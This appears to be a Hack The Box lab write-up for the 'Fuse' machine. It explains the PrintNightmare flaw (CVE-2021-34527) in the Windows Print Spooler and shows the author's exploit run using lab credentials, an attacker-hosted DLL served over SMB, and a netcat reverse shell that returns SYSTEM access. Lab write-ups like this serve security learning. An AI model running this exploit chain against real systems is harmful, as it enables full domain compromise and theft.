InfoSec LAB

Fuse_Privilege_Escalation_3

Created: 4 min read

CVE-2021-34527

a vulnerability has been found in microsoft windows (Operating System) and classified as critical. This vulnerability affects the function RpcAddPrinterDriverEx of the file spoolsv.exe of the component Print Spooler Service. The manipulation of the argument dwFileCopyFlags with an unknown input leads to a access control vulnerability. The CWE definition for the vulnerability is CWE-284. The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor. As an impact it is known to affect confidentiality, integrity, and availability.

Overview of CVE-2021-1675/CVE-2021-34527

Testing

The vulnerability is essentially a remote version of CVE-2021-1675

┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ impacket-rpcdump $IP | egrep 'MS-RPRN|MS-PAR'           
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol 
 
*Evil-WinRM* PS C:\tmp> Get-Service Spooler
 
Status   Name               DisplayName
------   ----               -----------
Running  Spooler            Print Spooler

This has already been enumerated before from multiple sources, but confirming it here again.

Exploit (PrintNightmare)

there’s been lots of trials and errors prior to discovering this one. The exploit was found online

PrintNightmare allows an attacker to execute remote commands to gain full access to a domain controller and take over the whole domain — with user-level access. The exploit takes advantage of the Windows-native service called Print Spooler that is enabled by default on all Windows machines (servers and endpoints)

The tool to exploit this vulnerability only requires a valid credential and one of the two RPC protocols to be enabled on the target system

Print Nightmare works by exploiting a logic flaw in the MS-RPRN protocol’s RpcAddPrinterDriverEx function or, which allows underprivileged users to define their own (.dll) print drivers. These drivers are ultimately loaded by the SYSTEM user giving way to privilege escalation.

There’s been another method through the MS-PAR protocol’s the RpcAsyncAddPrinterDriver function. This is similar to RpcAddPrinterDriverEx, but, has far less constraints and is not limited to domain controllers or Windows 10 systems with non-default settings.

Exploitation

┌──(kali㉿kali)-[~/…/htb/labs/fuse/CVE-2021-34527]
└─$ python3 CVE-2021-34527.py $IP -d FABRICORP.LOCAL -u bnielson -p Qwer1234 -proto MS-RPRN -dll printnightmare.dll --local-ip 10.10.14.5 -share smb
[*] starting PrintNightmare PoC
[+] Self-hosted payload at \\10.10.14.5\smb\printnightmare.dll
 
[*] Attempting target: 10.10.10.193
[*] Connecting to ncacn_np:10.10.10.193[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_dcef07064d319714\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.5\smb\printnightmare.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
[-] Exploit returned: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)
[*] Closing SMB Server

Launching the exploit.

I can do this remotely as any valid user. Notice I am doing it as the bnielson user, I could have done this remotely without even gaining a foothold as the svc-print user I love this exploit script in particular as it also hosts the payload over SMB whereas some other exploits don’t do that.

┌──(kali㉿kali)-[~/…/htb/labs/fuse/CVE-2021-34527]
└─$ nnc 1234     
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.193] 49733
Windows PowerShell running as user FUSE$ on FUSE
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
Fuse
PS C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::bb
   IPv6 Address. . . . . . . . . . . : dead:beef::a503:3c1b:a607:49b2
   Link-local IPv6 Address . . . . . : fe80::a503:3c1b:a607:49b2%5
   IPv4 Address. . . . . . . . . . . : 10.10.10.193
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%5
                                       10.10.10.2
 
Tunnel adapter isatap.{AF2C7A34-A136-4854-894E-84F30DA6C214}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : htb

Domain Level Compromise

Interactive Graph View

Backlinks